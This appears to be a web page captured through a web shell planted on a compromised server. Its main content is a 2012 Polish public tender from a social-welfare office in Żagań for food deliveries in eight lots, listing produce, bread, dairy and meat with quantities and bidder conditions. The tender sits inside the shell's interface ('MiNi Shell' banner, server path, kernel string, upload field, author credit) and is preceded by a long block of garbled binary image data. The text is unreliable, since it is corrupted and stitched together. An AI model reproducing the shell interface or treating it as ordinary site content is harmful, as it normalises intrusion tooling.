JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121109/441060-N-2012.html

<p class="kh_header"><b>Żagań: Dostawa artykułów żywnościowych do Ośrodka Pomocy Społecznej w Żaganiu w okresie od 01.01.2013 do 31.12.2012</b><br>
<b>Numer ogłoszenia: 441060 - 2012; data zamieszczenia: 09.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Pstrowskiego 3, 68-100 Żagań, woj. lubuskie, tel. 0-68 4781454/55, faks 0-68 4781454/55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ops.zagan.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.ops.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Ośrodka Pomocy Społecznej w Żaganiu w okresie od 01.01.2013 do 31.12.2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych
Zamawiający udziela zamówienia w 8 częściach, poprzez możliwość złożenia odrębnych ofert na każdą część zamówienia.
Część I - będzie obejmować warzywa i owoce.
Część II - będzie obejmować ziemniaki.
Część III - obejmować będzie chleb.
Część IV - obejmować będzie mrożone artykuły spożywcze.
Część V - obejmować będzie jaja kurze.
Część VI - obejmować będzie artykuły ogólnospożywcze.
Część VII - obejmować będzie artykuły nabiałowe.
Część VIII - obejmować będzie mięso, drób, wędliny i konserwy
Wykonawca może złożyć ofertę na dowolną ilość części.

Przedmiot dostawy przewidzianej do wykonania obejmuje :

Część I dostawa warzyw i owoców

1.Buraki	kg	600
2.Botwina z min. 4 korzeniami o średnicy min. 4 cm i nacią o długości nie mniejszej niż 25 cm	pęcz.	80
3.Cebula	kg	500
4.Czosnek główka o średnicy nie mniejszej niż 5 cm	szt.	20
5.Fasola Jaś	kg	250
6.Fasola szparagowa	kg	200
7.Groch łuskany	kg	180
8.Jabłka winne o gramaturze 1 jabłka nie mniejszej niż 20 dkg	kg	400
9.Kapusta biała	kg	600
10.Kapusta młoda o wadze 1 główki nie mniejszej niż 2,5 kg	szt.	200
11.Kapusta czerwona	kg	200
12.Kapusta kiszona	kg	600
13.Kapusta pekińska	kg	400
14.Kalafior o wadze 1 główki nie mniejszej niż 1,5 kg	szt.	150
15.Koper o wadze 1 pęczka nie mnie mniejszej niż 10 dkg	pęcz.	240
16.Marchew	kg	1600
17.Natka pietruszki o wadze 1 pęczka nie mniejszej niż 10 dkg	pęcz.	700
18.Ogórki kiszone	kg	200
19.Ogórki świeże	kg	260
20.Papryka	kg	100
21.Pieczarki	kg	340
22.Pietruszka	kg	540
23.Pomarańcze	kg	10
24.Pomidory	kg	400
25.Por o długości nie mniejszej niż 30 cm    i średnicy korzenia nie mniejszej niż 4 cm	szt.	50
26.Sałata o wadze 1 główki nie mniejszej niż 40 dkg	szt.	450
27.Seler z nacią o długości naci nie mniejszej niż 20 cm i średnicy korzenia nie mniejszej niż 5 cm	szt.	60
28.Seler	kg	600
29.Śliwka węgierka	kg	20
30.Szczaw świeży o wadze 1 pęczka nie mniejszej niż 20 dkg	pęcz.	120
31.Truskawka	kg	20
32.Wiśnia	kg	20


Część II dostawa ziemniaków

1.Ziemniaki jadalne	kg	24.000


Część III dostawa chleba

1.Chleb zwykły krojony o wadze 600g	szt.	16.000


Część IV dostawa mrożonych artykułów spożywczych

1.Brukselka mrożona	kg	80
2.Fasolka szparagowa	kg	80
3.Groszek zielony mrożony	kg	80
4.Kalafior mrożony	kg	80
5.Mieszanka kompotowa składająca się z min 4 owoców	kg	150
6.Śliwka mrożona	kg	50
7.Truskawka mrożona	kg	30
8.Wiśnia mrożona	kg	60
9.Filet z miruny ze skórą bez glazury SHP	kg	350

Część V dostawa jaj kurzych 

1.Jaja kurze M - średnie szt.	6.800

Część VI dostawa artykułów ogólnospożywczych

1.Bazylia 20g	szt.	40
2.Bułka tarta	kg	100
3.Cukier biały	kg	600
4.Cukier waniliowy 32g	szt.	6
5.Chrzan konserwowy opakowanie 190g	szt.	60
6.Cynamon 20g	szt.	10
7.Czosnek granulowany 30g	szt.	350
8.Drożdże, opakowanie 100g	szt.	30
9.Galaretka wielosmakowa (wiśniowa, truskawkowa, agrestowa, pomarańczowa), opakowanie 80g	szt.	960
10.Groszek konserwowy w puszce o wadze 400g	szt.	60
11.Herbata rozpuszczalna granulowana 400g	szt.	60
12.Kasza jęczmienna, opakowanie 1 kg	kg	250
13.Kasza manna, opakowanie 1 kg	kg 	6
14.Kisiel 40g (różne smaki)	szt.	120
15.Klopsy wieprzowe w sosie pomidorowym, opakowanie 500g
Skład: woda, mięso wieprzowe mon. 26%, warzywa, mąka pszenna, koncentrat pomidorowy, sól, tłuszcz roślinny, przyprawy, wartość energetyczna min. 110 kcal/100g	szt.	400
16.Kukurydza konserwowa w puszce o wadze 340g	szt.	200
17.Koncentrat pomidorowy 30% o wadze 190g	szt.	1000
18.Kwasek cytrynowy 74g	szt.	130
19.Liść laurowy 5g	szt.	100
20.Majeranek 20g	szt.	250
21.Majonez 620g
Składniki: olej roślinny, woda, ocet spirytusowy, cukier, sól, żółtko, wartość energetyczna 611kcal/100g)	szt.	30
22.Makaron łazanki	kg	40
23.Makaron nitki	kg	60
24.Makaron spaghetti	kg	200
25.Makaron świderki	kg	100
26.Makaron zacierka	kg	10
27.Mąka pszenna tortowa 	kg	360
28.Mąka ziemniaczana	kg	40
29.Musztarda sarepska 210g	szt.	60
30.Ocet spirytusowy	l	4
31.Ogórki konserwowe opakowanie 900g	szt.	250
32.Olej rzepakowy	l	700
33.Papryka ostra 20g	szt.	40
34.Papryka słodka 30g	szt.	120
35.Pieprz czarny mielony 20g	szt.	250
36.Pieprz ziołowy 30g	szt.	450
37.Przyprawa do flaków 20g	szt.	15
38.Przyprawa do kurczaka 25g	szt.	30
39.Przyprawa warzywna do potraw opakowanie 750g
Skład: warzywa suszone 7,5% (marchew, ziemniaki, pasternak, cebula, seler, natka pietruszki), sól, cukier, 	szt.	300
40.Przyprawa w płynie do zup, sosów, sałatek, opakowanie 1 kg
Składniki: woda, sól, ocet, glukoza, aromaty (seler) 1, ekstrat z lubczyka, 	kg	200
41.Ryż długoziarnisty, opakowanie 1 kg	kg	150
42.Sałatka wielowarzywna 900g 
Skład: marchew, ogórki, cebula, papryka, woda. cukier, sól	szt.	300
43.Sos do spagtti 20g	szt.	200
44.Sól	kg	300
45.Syrop owocowy 400ml	szt.	36
46.Szczaw konserwowy o wadze opakowania 280g	szt.	20
47.Filet śledziowy solony	kg	50
48.Ziele angielskie 12g	szt.	100
49.Zupa żurek 66g 
Skład: mąka żytnia, mąka pszenna, mleko odtłuszczone w proszku, mąka ryżowa, tłuszcz roślinny, ekstrakty drożdżowe suszone, cukier, regulator kwasowości, aromat dymu wędzarniczego, koncentrat czosnku	szt.	500

Część VII dostawa produktów nabiałowych

1.Mleko 1.5%tł. UHT  1l 	l	50
2Mleko 2%tł.1l	l	400
3.Jogurt z kawałkami owoców, opakowanie 150g	szt.	5000
4.Masło 82% tłuszczu 200g	szt.	120
5.Margaryna o zmniejszonej zawartości tłuszczu, opakowanie 600g; Wartość odżywcza 370kcal/100g, białko,0,55g, węglowodany 2g, tłuszcz ok. 40g	szt.	15
6.Ser twarogowy półtłusty, opakowanie 250g	kg	100
7.Ser żółty 	kg	35
8.Ser topiony kostka kremowy opak. 100 g 	szt.	1000
9.Śmietana 18% opakowanie 400ml	szt.	1500

Część VIII dostawa mięsa, drobiu, wędlin i konserw

miary	Ilość

1.Boczek wędzony Kg	300
2.Filet z piersi z kurczaka świeżego Kg	350
3.Flaki wołowe blanszowane Kg	250
4.Kiełbasa zwyczajna Kg	500
5.Kaszanka jęczmienna w cienkim jelicie Kg	400
6.Kości wieprzowe Kg	700
7.Kurczak świeży cały Kg	250
8.Karkówka wieprzowa bez kości Kg	400
9.Łopatka wieprzowa bez kości Kg	600
10.Mięso mielone wieprzowe z łopatki Kg	400
11.Porcja rosołowa z kurczaka Kg	200
12.Schab wieprzowy bez kości Kg	500
13.Szynka wieprzowa bez kości Kg	200
14.Serca wieprzowe Kg	100
15. Skrzydełka kurczaka Kg	300
16.Udka kurczaka Kg	400
17.Wątróbka drobiowa z kurczaka Kg	150
18. Wątroba wieprzowa Kg	250
19.Wołowina antrykot z kością Kg	90
20.Żeberka wieprzowe mięsne Kg	500
21.Żołądki drobiowe z kurczaka Kg	150
22.Parówki cienkie wieprzowe Kg	350
23.Pasztetowa drobiowa w osłonce sztucznej Kg	250
24.Konserwa tyrolska, opakowanie jednostkowe 300g	kg	240
25.Pasztet drobiowy, opakowanie jednostkowe 130g-135g	kg	110

Informacje dodatkowe do przedmiotu zamówienia:
Cykliczne dostawy będą realizowane jak następuje:
Część I warzywa i owoce,
Część II ziemniaki
Część IV dostawa mrożonych artykułów spożywczych 
Część V jaja kurze świeże,
Część VI dostawa artykułów ogólnospożywczych, 
Część VII dostawa produktów nabiałowych
 - w następnym dniu po złożeniu zamówienia w godzinach od 7.00 do 14.00.
Część III chleb
Część VIII mięso, drób, wędliny i konserwy
 - w następnym dniu od złożenia zamówienia, codziennie od poniedziałku do piątku w godzinach od 7.00 do 10.00,
Artykuły żywnościowe zamawiane będą przez pracownika Zamawiającego telefonicznie, z podaniem rodzaju oraz ilości produktów.
Cykliczne dostawy realizowane będą środkiem transportu Wykonawcy i na jego koszt do siedziby Zamawiającego znajdującej się w Żaganiu przy ul. Pstrowskiego 3.
Wymagania stawiane Wykonawcy:
1. Wykonawca odpowiedzialny jest za zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.
2. Dostawa artykułów żywnościowych powinna odbywać się środkiem transportu spełniającym obowiązujące wymagania sanitarne dla danej części zamówienia.
3. Wykonawca odpowiedzialny jest za terminowe wykonanie zamówienia, 
4. Każda dostawa towaru wymagająca załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument,
5. Wykonawca zobowiązany jest do dostarczania artykułów żywnościowych w pierwszej klasie jakości.
6. Artykuły spożywcze muszą być dostarczane w ich początkowym okresie przydatności do spożycia,
7. Dostarczane artykuły muszą być dobrej jakości pod względem organoleptycznym (wygląd, smak, zapach),
8. Zamawiający zastrzega sobie prawo odmowy odbioru dostarczanych artykułów żywnościowych w przypadku stwierdzenia ich wad jakościowych.
9. W razie stwierdzenia dostawy artykułów żywnościowych złej jakości, Wykonawca zobowiązany jest do niezwłocznej wymiany towaru.
10. Dostawy winny odbywać się w odpowiednio przystosowanych pojemnikach (opakowaniach) stanowiących własność Wykonawcy i spełniających wymagania przewidziane do przechowywania żywności. Opakowania zwrotne Zamawiający zwróci przy kolejnej dostawie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten wymóg Wykonawcę, który w okresie ostatnich  trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał co najmniej jedną  dostawę, odpowiadającą przedmiotowi zamówienia o wartości brutto nie mniejszej jak:
8.000,00 zł dla części I - warzywa i owoce,
8.000,00 zł dla części II - ziemniaki,
9.600,00 zł dla części III - chleb,
3.200,00 zł dla części IV - mrożone artykuły spożywcze,
1.400,00 zł dla części V - jaja kurze,
10.000,00 zł dla części VI - artykuły ogólnospożywcze,
4.500,00 zł dla części VII - artykuły nabiałowe,
32.000,00 zł dla części VIII - mięso, drób, wędliny i konserwy.
Na potwierdzenie spełnienia tego warunku  Wykonawca złoży wraz z ofertą dokument określony w punkcie 6.9 podpunkt 1 litera b ogłoszenia.
Wykonawcy występujący wspólnie powyższy warunek mogą spełnić łącznie.
Wykonawca może polegać na wiedzy i doświadczeniu innych  podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.
Umowa zostanie zawarta na warunkach podanych w Specyfikacji Istotnych Warunków Zamówienia- zgodnie z projektem umowy stanowiącym załącznik nr 7 do niniejszej SIWZ. Umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w Specyfikacji Istotnych Warunków Zamówienia.
Umowa wymaga, pod rygorem nieważności zachowania formy pisemnej.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienia zabezpieczenia należytego wykonania umowy- jeżeli Zamawiający żąda takiego zabezpieczenia.
Umowę zawiera się na czas oznaczony.
Zamawiający na podstawie art.144 ust.1i2 Ustawy Prawo zamówień publicznych dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
W zakresie wartości wynagrodzenia:
- w przypadku zmniejszenia zapotrzebowania na dostawę artykułów żywnościowych Zamawiający zastrzega możliwość zmniejszenia ilości dostarczanych artykułów żywnościowych w każdej części zamówienia o maksymalnie 20% ilości wskazanych w zawartej umowie. Z tytułu zmniejszenia ilości dostarczanych artykułów żywnościowych nie przysługują Wykonawcy żadne roszczenia cywilnoprawne.
Zmiana umowy dokonana z naruszeniem warunku określonego w punkcie 16.6 SIWZ podlega unieważnieniu.
W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należnego w tytułu wykonania części umowy.
W przypadku powstania jakiejkolwiek szkody na skutek nie wykonania lub wadliwego wykonania dostaw objętych zamówieniem, Wykonawca dostaw zobowiązany jest do pokrycia całej powstałej szkody.
Obowiązującą formą odszkodowania uzgodnioną między stronami będą kary umowne.
 Strony zastrzegają sobie prawo dochodzenia odszkodowania uzupełniającego do wysokości rzeczywiście poniesionej szkody.
 Zamawiający nie przewiduje możliwości udzielenia zaliczek na poczet wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl /BIP/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Żaganiu ul. Pstrowskiego 3 68-100 Żagań /pokój nr 4/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Żaganiu ul. Pstrowskiego 3 68-100 Żagań /sekretariat pokój nr 19/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com